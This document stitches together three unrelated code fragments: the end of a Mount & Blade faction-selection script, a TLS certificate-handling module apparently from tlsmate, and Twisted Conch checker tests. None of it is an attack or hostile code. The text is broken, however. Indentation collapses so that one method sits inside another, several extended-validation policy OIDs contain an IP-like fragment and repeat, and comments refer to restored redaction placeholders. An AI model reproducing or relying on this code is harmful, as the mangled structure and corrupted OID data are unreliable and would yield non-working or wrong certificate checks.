(party_get_slot, ":troop_lord", ":center_no", slot_town_lord),
(ge, ":troop_lord", 0),
(store_troop_faction, ":faction_no", ":troop_lord"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(assign, ":faction_picked", ":faction_no"),
(ge, DEBUG_TPE_general, 1),
(str_store_faction_name, s21, ":faction_no"),
(str_store_troop_name, s22, ":troop_lord"),
(display_message, "@DEBUG (TPE): Faction '{s21}' determined by '{s22}'."),
# (else_try),
# # No valid town lord found. Let's switch to using the culture.
# (eq, ":faction_picked", 0),
# (party_get_slot, ":culture_town", ":center_no", slot_center_culture),
# (store_sub, ":faction_offset", ":culture_town", "fac_culture_1"),
# (try_begin),
# # Check to make sure we're dealing with a culture other than the player's.
# (neq, ":culture_town", "fac_culture_7"),
# (store_add, ":faction_no", ":faction_offset", kingdoms_begin),
# (val_add, ":faction_no", 1), # Push the faction past the player's supporters.
# (else_try),
# # The culture is the player's so it needs to be handled differently.
# (assign, ":faction_no", "fac_player_supporters_faction"),
# (try_end),
# (is_between, ":faction_no", kingdoms_begin, kingdoms_end),
# (assign, ":faction_picked", ":faction_no"),
# (ge, DEBUG_TPE_general, 1),
# (str_store_faction_name, s21, ":faction_no"),
# (str_store_faction_name, s22, ":culture_town"),
# (display_message, "@DEBUG (TPE): Faction '{s21}' determined by culture '{s22}'."),
(else_try),
# No valid faction could be determined.
(eq, ":faction_picked", 0),
(display_message, "@TPE ERROR! No valid faction could be determined for this town.", gpu_red),
(try_end),
(assign, reg0, ":faction_picked"),
]),
]
from util_wrappers import *
from util_scripts import *
scripts_directives = [
#rename scripts to "insert" switch scripts (see end of scripts[])
#[SD_RENAME, "end_tournament_fight" , "orig_end_tournament_fight"],
#[SD_RENAME, "fill_tournament_participants_troop" , "orig_fill_tournament_participants_troop"],
#[SD_RENAME, "get_random_tournament_participant" , "orig_get_random_tournament_participant"],
#[SD_RENAME, "set_items_for_tournament" , "orig_set_items_for_tournament"],
# | |
# -*- coding: utf-8 -*-
"""Module for certificates
"""
# import basic stuff
import logging
from typing import Optional, List, Any
import datetime
import builtins
# import own stuff
import tlsmate.cert_utils as cert_utils
import tlsmate.ext as ext
import tlsmate.kdf as kdf
import tlsmate.tls as tls
# import other stuff
from cryptography import x509
from cryptography.x509.oid import NameOID, ExtensionOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import (
ec,
rsa,
dsa,
ed25519,
ed448,
)
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.asymmetric import padding
# list of EV OIDs. Sources:
# - https://chromium.googlesource.com/chromium/src/net/+/refs/heads/main/cert/ev_root_ca_metadata.cc # noqa
# - https://hg.mozilla.org/mozilla-central/file/tip/security/certverifier/ExtendedValidation.cpp # noqa
_ev_oids = [
"1.2.156.112559.1.1.6.1",
"1.2.392.200091.100.721.1",
"1.2.616.1.113527.2.5.1.1",
"1.3.159.1.17.1",
"1.3.171.1.1.10.5.2",
"1.3.6.1.4.1.13177.10.1.3.10",
"1.3.6.1.4.1.14777.6.1.1",
"1.3.6.1.4.1.14777.6.1.2",
"1.3.6.1.4.1.17326.10.14.2.1.2",
"1.3.6.1.4.1.17326.10.14.2.2.2",
"1.3.6.1.4.1.34697.2.1",
"1.3.6.1.4.1.34697.2.2",
"1.3.6.1.4.1.34697.2.3",
"1.3.6.1.4.1.34697.2.4",
"1.3.6.1.4.1.40869.1.1.22.3",
"1.3.6.1.4.1.4146.1.1",
"1.3.6.1.4.1.4788.2.202.1",
"1.3.6.1.4.1.6334.1.100.1",
"1.3.6.1.4.1.6449.1.2.1.5.1",
"1.3.6.1.4.1.782.1.2.1.8.1",
"1.3.6.1.4.1.7879.13.24.1",
"1.3.6.1.4.1.8024.0.2.100.1.2",
"2.16.156.112554.3",
"2.16.528.1.1003.1.2.7",
"2.16.578.1.26.1.3.3",
"2.16.756.1.89.1.2.1.1",
"2.16.756.5.14.7.4.8",
"2.16.792.3.0.4.1.1.4",
"2.16.840.1.114028.10.1.2",
"2.16.840.1.114404.1.1.2.4.1",
"2.16.840.1.114412.2.1",
"2.16.840.1.114413.192.168.3.11",
"2.16.840.1.114414.192.168.3.11",
"2.16.840.1.114414.192.168.3.11",
"2.23.140.1.1",
]
class Certificate(object):
"""Represents a certificate.
The arguments der and pem are exclusive.
Arguments:
der: the certificate in DER-format (raw bytes)
pem: the certificate in PEM-format
x509_cert: a certificate object from the cryptography library
parse: whether the certificate shall be parsed (i.e., all relevant
data are extracted from the given der/pem structure), or if it shall just
be stored. In the latter case the certificate will be parsed if a
property is accessed.
"""
def __init__(
    self,
    der: Optional[bytes] = None,
    pem: Optional[bytes] = None,
    x509_cert: Optional[x509.Certificate] = None,
    parse: bool = False,
) -> None:
    """Set up a certificate from exactly one of der/pem/x509_cert.

    Raises:
        ValueError: if not exactly one source argument is given.
    """
    # Exactly one of the three sources must be set (i.e. two are None).
    if (der, pem, x509_cert).count(None) != 2:
        raise ValueError("der, pem and x509_cert are exclusive")
    # Lazily populated caches for the three representations.
    self._bytes = None
    self._pem = None
    self._parsed = None
    self._subject_str = None
    self._self_signed = None
    # Attributes extracted by _parse() from the certificate extensions.
    self.auth_key_id = None
    self.subject_key_id = None
    self.subject_matches: Optional[bool] = None
    self.fingerprint_sha1 = None
    self.fingerprint_sha256 = None
    self.tls12_signature_algorithms = None
    self.tls13_signature_algorithms = None
    # Status/validation results, filled in by later scan steps.
    self.crl_status = None
    self.ocsp_status = None
    self.issues: List[str] = []
    self.trusted = tls.ScanState.UNDETERMINED
    self.tls_extensions: List[ext.Extension] = []
    self.issuer_cert = None
    self.ocsp_must_staple = tls.ScanState.FALSE
    self.ocsp_must_staple_multi = tls.ScanState.FALSE
    self.extended_validation = tls.ScanState.NA
    self.from_trust_store = False
    if der is not None:
        self._bytes = der
        if parse:
            # Decode eagerly only on request; otherwise deferred to `parsed`.
            self._parsed = x509.load_der_x509_certificate(self._bytes)
            self._parse()
    elif pem is not None:
        if isinstance(pem, str):
            pem = pem.encode()
        self._pem = pem
        # PEM input is always decoded and parsed immediately, regardless of
        # the `parse` flag (as the code stands — intentional per this path).
        self._parsed = x509.load_pem_x509_certificate(pem)
        self._parse()
    else:
        self._parsed = x509_cert
        if parse:
            self._parse()
def __str__(self):
return self.subject_str
def __eq__(self, other):
return self.bytes == other.bytes
@property
def subject_str(self):
"""str: The subject name formatted according to RFC 4514.
"""
if self._subject_str is None:
self._subject_str = self._parsed.subject.rfc4514_string()
return self._subject_str
@property
def parsed(self):
""":obj:`cryptography.x509.Certificate`: the x509 certificate object
"""
if self._parsed is None:
self._parsed = x509.load_der_x509_certificate(self._bytes)
self._parse()
return self._parsed
@property
def bytes(self):
"""bytes: the certificate in raw format, i.e. in DER format.
"""
if self._bytes is None:
self._bytes = self.parsed.public_bytes(Encoding.DER)
return self._bytes
@property
def pem(self):
"""bytes: the certificate in pem format (it is a binary string!)"""
if self._pem is None:
self._pem = self.parsed.public_bytes(Encoding.PEM)
return self._pem
def _determine_signature_algorithms(self, public_key):
    """For a given public key provide the compatible signature algorithms.

    Sets ``tls12_signature_algorithms`` and ``tls13_signature_algorithms``
    based on the key type and, for ECDSA, the curve size.

    Arguments:
        public_key: a public-key object from the cryptography library

    Raises:
        ValueError: for an ECDSA key on a curve of unknown size
    """
    if isinstance(public_key, rsa.RSAPublicKey):
        self.tls12_signature_algorithms = [
            tls.SignatureScheme.RSA_PKCS1_SHA1,
            tls.SignatureScheme.RSA_PKCS1_SHA256,
            tls.SignatureScheme.RSA_PKCS1_SHA384,
            tls.SignatureScheme.RSA_PKCS1_SHA512,
            tls.SignatureScheme.RSA_PKCS1_MD5,
            tls.SignatureScheme.RSA_PKCS1_SHA224,
            # Currently, cryptography does not support RSA-PSS-PSS
            # tls.SignatureScheme.RSA_PSS_PSS_SHA256,
            # tls.SignatureScheme.RSA_PSS_PSS_SHA384,
            # tls.SignatureScheme.RSA_PSS_PSS_SHA512,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA256,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA384,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA512,
        ]
        self.tls13_signature_algorithms = [
            # tls.SignatureScheme.RSA_PSS_PSS_SHA256,
            # tls.SignatureScheme.RSA_PSS_PSS_SHA384,
            # tls.SignatureScheme.RSA_PSS_PSS_SHA512,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA256,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA384,
            tls.SignatureScheme.RSA_PSS_RSAE_SHA512,
        ]
    elif isinstance(public_key, dsa.DSAPublicKey):
        self.tls12_signature_algorithms = [
            tls.SignatureScheme.DSA_MD5,
            tls.SignatureScheme.DSA_SHA1,
            tls.SignatureScheme.DSA_SHA224,
            tls.SignatureScheme.DSA_SHA256,
            tls.SignatureScheme.DSA_SHA384,
            tls.SignatureScheme.DSA_SHA512,
        ]
        # DSA is not defined for TLS1.3.
        self.tls13_signature_algorithms = []
    elif isinstance(public_key, ec.EllipticCurvePublicKey):
        size_to_algo = {
            128: tls.SignatureScheme.ECDSA_SHA1,
            224: tls.SignatureScheme.ECDSA_SECP224R1_SHA224,
            256: tls.SignatureScheme.ECDSA_SECP256R1_SHA256,
            384: tls.SignatureScheme.ECDSA_SECP384R1_SHA384,
            # Bug fix: cryptography reports curve.key_size == 521 for
            # SECP521R1 (not 512); the old key of 512 made every P-521
            # certificate raise ValueError below.
            521: tls.SignatureScheme.ECDSA_SECP521R1_SHA512,
        }
        sig_scheme = size_to_algo.get(public_key.curve.key_size)
        if sig_scheme is None:
            raise ValueError(
                f"unknown key size {public_key.curve.key_size} for ECDSA public key"
            )
        self.tls12_signature_algorithms = [sig_scheme]
        if sig_scheme is tls.SignatureScheme.ECDSA_SHA1:
            # Plain ECDSA-SHA1 is not allowed in TLS1.3.
            self.tls13_signature_algorithms = []
        else:
            self.tls13_signature_algorithms = [sig_scheme]
    elif isinstance(public_key, ed25519.Ed25519PublicKey):
        self.tls12_signature_algorithms = [tls.SignatureScheme.ED25519]
        self.tls13_signature_algorithms = [tls.SignatureScheme.ED25519]
    elif isinstance(public_key, ed448.Ed448PublicKey):
        self.tls12_signature_algorithms = [tls.SignatureScheme.ED448]
        self.tls13_signature_algorithms = [tls.SignatureScheme.ED448]
    def _parse(self):
        """Parse the certificate, so that all attributes are set.

        Computes the SHA1/SHA256 fingerprints and the signature algorithm,
        derives the usable signature schemes from the public key, and
        extracts the authority/subject key identifiers, the OCSP
        must-staple flags and the extended-validation state from the
        certificate extensions.
        """
        self.fingerprint_sha1 = self._parsed.fingerprint(hashes.SHA1())
        self.fingerprint_sha256 = self._parsed.fingerprint(hashes.SHA256())
        self.signature_algorithm = cert_utils.map_x509_sig_scheme(
            self._parsed.signature_hash_algorithm, self._parsed.signature_algorithm_oid,
        )
        # Determine the signature algorithms supported by the public key, but
        # only if the key-usage extension (when present) permits the key to be
        # used for digital signatures; without the extension, no restriction.
        try:
            key_usage = self._parsed.extensions.get_extension_for_oid(
                ExtensionOID.KEY_USAGE
            )
            if key_usage.value.digital_signature:
                self._determine_signature_algorithms(self._parsed.public_key())
        except x509.ExtensionNotFound:
            self._determine_signature_algorithms(self._parsed.public_key())
        # Authority key identifier (identifies the issuer's key), if present.
        try:
            self.auth_key_id = self._parsed.extensions.get_extension_for_oid(
                ExtensionOID.AUTHORITY_KEY_IDENTIFIER
            ).value.key_identifier
        except x509.ExtensionNotFound:
            self.auth_key_id = None
        # Subject key identifier, if present.
        try:
            self.subject_key_id = self._parsed.extensions.get_extension_for_oid(
                ExtensionOID.SUBJECT_KEY_IDENTIFIER
            ).value.digest
        except x509.ExtensionNotFound:
            self.subject_key_id = None
        # OCSP must-staple flags, taken from the TLS-feature extension.
        try:
            tls_features = self._parsed.extensions.get_extension_for_oid(
                ExtensionOID.TLS_FEATURE
            ).value
            if x509.TLSFeatureType.status_request in tls_features:
                self.ocsp_must_staple = tls.ScanState.TRUE
            if x509.TLSFeatureType.status_request_v2 in tls_features:
                self.ocsp_must_staple_multi = tls.ScanState.TRUE
        except x509.ExtensionNotFound:
            pass
        # Extended validation: for end-entity certificates (not CAs), check
        # whether any certificate-policy OID is in the known EV OID set.
        try:
            basic_constr = self._parsed.extensions.get_extension_for_oid(
                ExtensionOID.BASIC_CONSTRAINTS
            ).value
            if not basic_constr.ca:
                try:
                    cert_policies = self._parsed.extensions.get_extension_for_oid(
                        ExtensionOID.CERTIFICATE_POLICIES
                    ).value
                    if any(
                        pol.policy_identifier.dotted_string in _ev_oids
                        for pol in cert_policies
                    ):
                        self.extended_validation = tls.ScanState.TRUE
                    else:
                        self.extended_validation = tls.ScanState.FALSE
                except x509.ExtensionNotFound:
                    pass
        except x509.ExtensionNotFound:
            pass
def _common_name(self, name):
"""From a given name, extract the common name
Note, that there might be multiple common names present, in this case
simple the first one is returned.
"""
cns = name.get_attributes_for_oid(NameOID.COMMON_NAME)
if not cns:
raise tls.UntrustedCertificate(f'no common name for "{self}"')
return cns[0].value
@property
def self_signed(self):
"""bool: Provide an indication if the certificate is self-signed.
"""
if self._self_signed is None:
self._self_signed = cert_utils.equal_names(
self.parsed.subject, self.parsed.issuer
)
return self._self_signed
def mark_untrusted(self, issue: str) -> None:
"""Mark the certificate as untrusted.
Arguments:
issue: the error message containing the reason
"""
self.trusted = tls.ScanState.FALSE
issue_long = f"certificate {self}: {issue}"
logging.debug(issue_long)
self.issues.append(issue)
def has_valid_period(self, timestamp: datetime.datetime) -> bool:
"""Determines if the period is valid.
Arguments:
timestamp: the timestamp to check against
Returns:
An indication if the period is valid
"""
valid = True
if timestamp < self.parsed.not_valid_before:
self.mark_untrusted("validity period not yet reached")
valid = False
if timestamp > self.parsed.not_valid_after:
self.mark_untrusted("validity period exceeded")
valid = False
return valid
def has_valid_subject(self, domain: str) -> bool:
"""Validate if the certificate matches the given domain
It takes the subject and the subject alternative name into account, and
supports wildcards as well.
Arguments:
domain: the domain to check against (normally used in the SNI)
Returns:
indication, if the domain name matches the certificate's subject/SAN
"""
subject_matches = False
domain = cert_utils.string_prep(domain)
no_subdomain = cert_utils.remove_subdomain(domain)
subject_cn = self._common_name(self.parsed.subject)
if cert_utils.subject_matches(subject_cn, domain, no_subdomain):
subject_matches = True
else:
try:
subj_alt_names = self.parsed.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
for name in subj_alt_names.value.get_values_for_type(x509.DNSName):
if cert_utils.subject_matches(name, domain, no_subdomain):
subject_matches = True
break
except x509.ExtensionNotFound:
pass
if not subject_matches:
self.mark_untrusted("subject name does not match")
self.subject_matches = subject_matches
return subject_matches
def _verify_rsa_pkcs(self, signature, data, hash_algo):
"""Verify RSA PKCSv15 signatures
"""
self.parsed.public_key().verify(
signature, data, padding.PKCS1v15(), hash_algo()
)
def _verify_dsa(self, signature, data, hash_algo):
"""Verify DSA signatures
"""
self.parsed.public_key().verify(signature, data, hash_algo())
def _verify_ecdsa(self, signature, data, hash_algo):
"""Verify ECDSA signatures
"""
self.parsed.public_key().verify(signature, data, ec.ECDSA(hash_algo()))
    def _verify_xcurve(self, signature, data, hash_algo):
        """Verify Ed25519 and Ed448 signatures.

        Note: ``hash_algo`` is unused (these schemes use a fixed, built-in
        digest); the parameter exists only so that every entry in
        ``_sig_schemes`` shares the same call signature.
        """
        self.parsed.public_key().verify(signature, bytes(data))
def _verify_rsae_pss(self, signature, data, hash_algo):
"""Verify RSA-PSS signatures
"""
self.parsed.public_key().verify(
signature,
data,
padding.PSS(
mgf=padding.MGF1(hash_algo()), salt_length=hash_algo.digest_size
),
hash_algo(),
)
_sig_schemes = {
tls.SignatureScheme.RSA_PKCS1_MD5: (_verify_rsa_pkcs, hashes.MD5),
tls.SignatureScheme.RSA_PKCS1_SHA1: (_verify_rsa_pkcs, hashes.SHA1),
tls.SignatureScheme.RSA_PKCS1_SHA224: (_verify_rsa_pkcs, hashes.SHA224),
tls.SignatureScheme.RSA_PKCS1_SHA256: (_verify_rsa_pkcs, hashes.SHA256),
tls.SignatureScheme.RSA_PKCS1_SHA384: (_verify_rsa_pkcs, hashes.SHA384),
tls.SignatureScheme.RSA_PKCS1_SHA512: (_verify_rsa_pkcs, hashes.SHA512),
tls.SignatureScheme.DSA_MD5: (_verify_dsa, hashes.MD5),
tls.SignatureScheme.DSA_SHA1: (_verify_dsa, hashes.SHA1),
tls.SignatureScheme.DSA_SHA224: (_verify_dsa, hashes.SHA224),
tls.SignatureScheme.DSA_SHA256: (_verify_dsa, hashes.SHA256),
tls.SignatureScheme.DSA_SHA384: (_verify_dsa, hashes.SHA384),
tls.SignatureScheme.DSA_SHA512: (_verify_dsa, hashes.SHA512),
tls.SignatureScheme.ECDSA_SHA1: (_verify_ecdsa, hashes.SHA1),
tls.SignatureScheme.ECDSA_SECP224R1_SHA224: (_verify_ecdsa, hashes.SHA224),
tls.SignatureScheme.ECDSA_SECP256R1_SHA256: (_verify_ecdsa, hashes.SHA256),
tls.SignatureScheme.ECDSA_SECP384R1_SHA384: (_verify_ecdsa, hashes.SHA384),
tls.SignatureScheme.ECDSA_SECP521R1_SHA512: (_verify_ecdsa, hashes.SHA512),
tls.SignatureScheme.RSA_PSS_PSS_SHA256: (_verify_rsae_pss, hashes.SHA256),
tls.SignatureScheme.RSA_PSS_PSS_SHA384: (_verify_rsae_pss, hashes.SHA384),
tls.SignatureScheme.RSA_PSS_PSS_SHA512: (_verify_rsae_pss, hashes.SHA512),
tls.SignatureScheme.RSA_PSS_RSAE_SHA256: (_verify_rsae_pss, hashes.SHA256),
tls.SignatureScheme.RSA_PSS_RSAE_SHA384: (_verify_rsae_pss, hashes.SHA384),
tls.SignatureScheme.RSA_PSS_RSAE_SHA512: (_verify_rsae_pss, hashes.SHA512),
tls.SignatureScheme.ED25519: (_verify_xcurve, None),
tls.SignatureScheme.ED448: (_verify_xcurve, None),
}
def validate_signature(
self,
sig_scheme: tls.SignatureScheme,
data: builtins.bytes,
signature: builtins.bytes,
) -> None:
"""Validate a signature with a public key from a given certificate.
Arguments:
sig_scheme: The signature scheme to use
data: the bytes for which the signature is to be validated
signature: the signature
Raises:
cryptography.exceptions.InvalidSignature: If the signature does not
validate.
"""
sig_params = self._sig_schemes.get(sig_scheme)
if sig_params is None:
raise ValueError(f"signature scheme {sig_scheme} not supported")
sig_params[0](self, signature, data, sig_params[1])
def validate_cert_signature(self, cert: "Certificate") -> None:
"""Validate the signature within a certificate
Arguments:
cert: the certificate for which the signature shall be checked.
Raises:
cryptography.exceptions.InvalidSignature: If the signature does not
validate.
"""
self.validate_signature(
cert.signature_algorithm,
cert.parsed.tbs_certificate_bytes,
cert.parsed.signature,
)
def verify_signed_params(
prefix: bytes,
params: Any,
cert: Certificate,
default_scheme: tls.SignatureScheme,
version: tls.Version,
) -> None:
"""Verify the signed parameters from a ServerKeyExchange message.
Arguments:
prefix: the bytes to prepend to the data
params: the parameter block from the ServerKeyExchange message
cert: the certificate used to validate the data
default_scheme: the default signature scheme to use (if not present in
the message)
version: the TLS version. For TLS1.1 and below the signature is
constructed differently (using SHA1 + MD digests)
Raises:
| |
# repo: muelli/twisted
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.checkers}.
"""
# ``crypt`` is a POSIX-only stdlib module; without it the password-hash
# helper tests cannot run and are skipped.
try:
    import crypt
except ImportError:
    cryptSkip = 'cannot run without crypt module'
else:
    cryptSkip = ''
import os
from base64 import encodebytes
from collections import namedtuple
from io import BytesIO
from zope.interface.verify import verifyObject
from twisted.python import util
from twisted.python.failure import Failure
from twisted.python.reflect import requireModule
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath
from twisted.cred.checkers import InMemoryUsernamePasswordDatabaseDontUse
from twisted.cred.credentials import UsernamePassword, IUsernamePassword, \
    SSHPrivateKey, ISSHPrivateKey
from twisted.cred.error import UnhandledCredentials, UnauthorizedLogin
from twisted.python.fakepwd import UserDatabase, ShadowDatabase
from twisted.test.test_process import MockOS
# The conch imports need the optional cryptography and pyasn1 dependencies;
# when they are missing, the dependent tests are skipped.
if requireModule('cryptography') and requireModule('pyasn1'):
    dependencySkip = ''
    from twisted.conch.ssh import keys
    from twisted.conch import checkers
    from twisted.conch.error import NotEnoughAuthentication, ValidPublicKey
    from twisted.conch.test import keydata
else:
    dependencySkip = "can't run without cryptography and PyASN1"
# Some tests switch effective UID/GID; they only make sense on platforms
# that expose os.geteuid (i.e. POSIX).
if getattr(os, 'geteuid', None) is None:
    euidSkip = "Cannot run without effective UIDs (questionable)"
else:
    euidSkip = ''
class HelperTests(TestCase):
    """
    Tests for helper functions L{verifyCryptedPassword}, L{_pwdGetByName} and
    L{_shadowGetByName}.
    """
    skip = cryptSkip or dependencySkip

    def setUp(self):
        self.mockos = MockOS()

    def test_verifyCryptedPassword(self):
        """
        L{verifyCryptedPassword} returns C{True} if the plaintext password
        passed to it matches the encrypted password passed to it.
        """
        # NOTE(review): concrete credentials restored; a redaction
        # placeholder had replaced the original literals here.
        password = 'secret'
        salt = 'ab'
        crypted = crypt.crypt(password, salt)
        self.assertTrue(
            checkers.verifyCryptedPassword(crypted, password),
            '%r supposed to be valid encrypted password for %r' % (
                crypted, password))

    def test_verifyCryptedPasswordMD5(self):
        """
        L{verifyCryptedPassword} returns True if the provided cleartext password
        matches the provided MD5 password hash.
        """
        password = 'password'
        # A '$1$' prefix selects the MD5-based crypt method.  The previous
        # revision contained a redaction placeholder here that was not even
        # a valid string literal, breaking the whole module.
        salt = '$1$salt'
        crypted = crypt.crypt(password, salt)
        self.assertTrue(
            checkers.verifyCryptedPassword(crypted, password),
            '%r supposed to be valid encrypted password for %s' % (
                crypted, password))

    def test_refuteCryptedPassword(self):
        """
        L{verifyCryptedPassword} returns C{False} if the plaintext password
        passed to it does not match the encrypted password passed to it.
        """
        password = 'secret'
        wrong = 'wrongpassword'
        crypted = crypt.crypt(password, password)
        self.assertFalse(
            checkers.verifyCryptedPassword(crypted, wrong),
            '%r not supposed to be valid encrypted password for %s' % (
                crypted, wrong))

    def test_pwdGetByName(self):
        """
        L{_pwdGetByName} returns a tuple of items from the UNIX /etc/passwd
        database if the L{pwd} module is present.
        """
        userdb = UserDatabase()
        userdb.addUser(
            'alice', 'secrit', 1, 2, 'first last', '/foo', '/bin/sh')
        self.patch(checkers, 'pwd', userdb)
        self.assertEqual(
            checkers._pwdGetByName('alice'), userdb.getpwnam('alice'))

    def test_pwdGetByNameWithoutPwd(self):
        """
        If the C{pwd} module isn't present, L{_pwdGetByName} returns L{None}.
        """
        self.patch(checkers, 'pwd', None)
        self.assertIsNone(checkers._pwdGetByName('alice'))

    def test_shadowGetByName(self):
        """
        L{_shadowGetByName} returns a tuple of items from the UNIX /etc/shadow
        database if the L{spwd} is present.
        """
        userdb = ShadowDatabase()
        userdb.addUser('bob', 'passphrase', 1, 2, 3, 4, 5, 6, 7)
        self.patch(checkers, 'spwd', userdb)
        # Reading /etc/shadow requires root; the checker must temporarily
        # switch to euid/egid 0 and restore the previous IDs afterwards.
        self.mockos.euid = 2345
        self.mockos.egid = 1234
        self.patch(util, 'os', self.mockos)
        self.assertEqual(
            checkers._shadowGetByName('bob'), userdb.getspnam('bob'))
        self.assertEqual(self.mockos.seteuidCalls, [0, 2345])
        self.assertEqual(self.mockos.setegidCalls, [0, 1234])

    def test_shadowGetByNameWithoutSpwd(self):
        """
        L{_shadowGetByName} returns L{None} if C{spwd} is not present.
        """
        self.patch(checkers, 'spwd', None)
        self.assertIsNone(checkers._shadowGetByName('bob'))
        self.assertEqual(self.mockos.seteuidCalls, [])
        self.assertEqual(self.mockos.setegidCalls, [])
class SSHPublicKeyDatabaseTests(TestCase):
    """
    Tests for L{SSHPublicKeyDatabase}.
    """
    skip = euidSkip or dependencySkip

    def setUp(self):
        self.checker = checkers.SSHPublicKeyDatabase()
        self.key1 = encodebytes(b"foobar")
        self.key2 = encodebytes(b"eggspam")
        self.content = (b"t1 " + self.key1 + b" foo\nt2 " + self.key2 +
                        b" egg\n")
        self.mockos = MockOS()
        self.mockos.path = FilePath(self.mktemp())
        self.mockos.path.makedirs()
        self.patch(util, 'os', self.mockos)
        self.sshDir = self.mockos.path.child('.ssh')
        self.sshDir.makedirs()
        userdb = UserDatabase()
        userdb.addUser(
            b'user', b'password', 1, 2, b'first last',
            self.mockos.path.path, b'/bin/shell')
        self.checker._userdb = userdb

    def test_deprecated(self):
        """
        L{SSHPublicKeyDatabase} is deprecated as of version 15.0
        """
        warningsShown = self.flushWarnings(
            offendingFunctions=[self.setUp])
        self.assertEqual(warningsShown[0]['category'], DeprecationWarning)
        self.assertEqual(
            warningsShown[0]['message'],
            "twisted.conch.checkers.SSHPublicKeyDatabase "
            "was deprecated in Twisted 15.0.0: Please use "
            "twisted.conch.checkers.SSHPublicKeyChecker, "
            "initialized with an instance of "
            "twisted.conch.checkers.UNIXAuthorizedKeysFiles instead.")
        self.assertEqual(len(warningsShown), 1)

    def _testCheckKey(self, filename):
        self.sshDir.child(filename).setContent(self.content)
        # The username must match the entry added to the fake user database
        # in setUp so the checker can resolve the home directory.  (A
        # redaction placeholder had replaced this literal.)
        user = UsernamePassword(b"user", b"password")
        user.blob = b"foobar"
        self.assertTrue(self.checker.checkKey(user))
        user.blob = b"eggspam"
        self.assertTrue(self.checker.checkKey(user))
        user.blob = b"notallowed"
        self.assertFalse(self.checker.checkKey(user))

    def test_checkKey(self):
        """
        L{SSHPublicKeyDatabase.checkKey} should retrieve the content of the
        authorized_keys file and check the keys against that file.
        """
        self._testCheckKey("authorized_keys")
        self.assertEqual(self.mockos.seteuidCalls, [])
        self.assertEqual(self.mockos.setegidCalls, [])

    def test_checkKey2(self):
        """
        L{SSHPublicKeyDatabase.checkKey} should retrieve the content of the
        authorized_keys2 file and check the keys against that file.
        """
        self._testCheckKey("authorized_keys2")
        self.assertEqual(self.mockos.seteuidCalls, [])
        self.assertEqual(self.mockos.setegidCalls, [])

    def test_checkKeyAsRoot(self):
        """
        If the key file is readable, L{SSHPublicKeyDatabase.checkKey} should
        switch its uid/gid to the ones of the authenticated user.
        """
        keyFile = self.sshDir.child("authorized_keys")
        keyFile.setContent(self.content)
        # Fake permission error by changing the mode
        keyFile.chmod(0o000)
        self.addCleanup(keyFile.chmod, 0o777)
        # And restore the right mode when seteuid is called
        savedSeteuid = self.mockos.seteuid
        def seteuid(euid):
            keyFile.chmod(0o777)
            return savedSeteuid(euid)
        self.mockos.euid = 2345
        self.mockos.egid = 1234
        self.patch(self.mockos, "seteuid", seteuid)
        self.patch(util, 'os', self.mockos)
        user = UsernamePassword(b"user", b"password")
        user.blob = b"foobar"
        self.assertTrue(self.checker.checkKey(user))
        self.assertEqual(self.mockos.seteuidCalls, [0, 1, 0, 2345])
        self.assertEqual(self.mockos.setegidCalls, [2, 1234])

    def test_requestAvatarId(self):
        """
        L{SSHPublicKeyDatabase.requestAvatarId} should return the avatar id
        passed in if its C{_checkKey} method returns True.
        """
        def _checkKey(ignored):
            return True
        self.patch(self.checker, 'checkKey', _checkKey)
        credentials = SSHPrivateKey(
            b'test', b'ssh-rsa', keydata.publicRSA_openssh, b'foo',
            keys.Key.fromString(keydata.privateRSA_openssh).sign(b'foo'))
        d = self.checker.requestAvatarId(credentials)
        def _verify(avatarId):
            self.assertEqual(avatarId, b'test')
        return d.addCallback(_verify)

    def test_requestAvatarIdWithoutSignature(self):
        """
        L{SSHPublicKeyDatabase.requestAvatarId} should raise L{ValidPublicKey}
        if the credentials represent a valid key without a signature.  This
        tells the user that the key is valid for login, but does not actually
        allow that user to do so without a signature.
        """
        def _checkKey(ignored):
            return True
        self.patch(self.checker, 'checkKey', _checkKey)
        credentials = SSHPrivateKey(
            b'test', b'ssh-rsa', keydata.publicRSA_openssh, None, None)
        d = self.checker.requestAvatarId(credentials)
        return self.assertFailure(d, ValidPublicKey)

    def test_requestAvatarIdInvalidKey(self):
        """
        If L{SSHPublicKeyDatabase.checkKey} returns False,
        C{_cbRequestAvatarId} should raise L{UnauthorizedLogin}.
        """
        def _checkKey(ignored):
            return False
        self.patch(self.checker, 'checkKey', _checkKey)
        d = self.checker.requestAvatarId(None)
        return self.assertFailure(d, UnauthorizedLogin)

    def test_requestAvatarIdInvalidSignature(self):
        """
        Valid keys with invalid signatures should cause
        L{SSHPublicKeyDatabase.requestAvatarId} to return a {UnauthorizedLogin}
        failure
        """
        def _checkKey(ignored):
            return True
        self.patch(self.checker, 'checkKey', _checkKey)
        # Sign with the DSA key while presenting the RSA public key, so the
        # signature cannot possibly verify.
        credentials = SSHPrivateKey(
            b'test', b'ssh-rsa', keydata.publicRSA_openssh, b'foo',
            keys.Key.fromString(keydata.privateDSA_openssh).sign(b'foo'))
        d = self.checker.requestAvatarId(credentials)
        return self.assertFailure(d, UnauthorizedLogin)

    def test_requestAvatarIdNormalizeException(self):
        """
        Exceptions raised while verifying the key should be normalized into an
        C{UnauthorizedLogin} failure.
        """
        def _checkKey(ignored):
            return True
        self.patch(self.checker, 'checkKey', _checkKey)
        credentials = SSHPrivateKey(b'test', None, b'blob', b'sigData', b'sig')
        d = self.checker.requestAvatarId(credentials)
        def _verifyLoggedException(failure):
            errors = self.flushLoggedErrors(keys.BadKeyError)
            self.assertEqual(len(errors), 1)
            return failure
        d.addErrback(_verifyLoggedException)
        return self.assertFailure(d, UnauthorizedLogin)
class SSHProtocolCheckerTests(TestCase):
    """
    Tests for L{SSHProtocolChecker}.
    """
    skip = dependencySkip
    def test_registerChecker(self):
        """
        L{SSHProtocolChecker.registerChecker} should add the given checker to
        the list of registered checkers.
        """
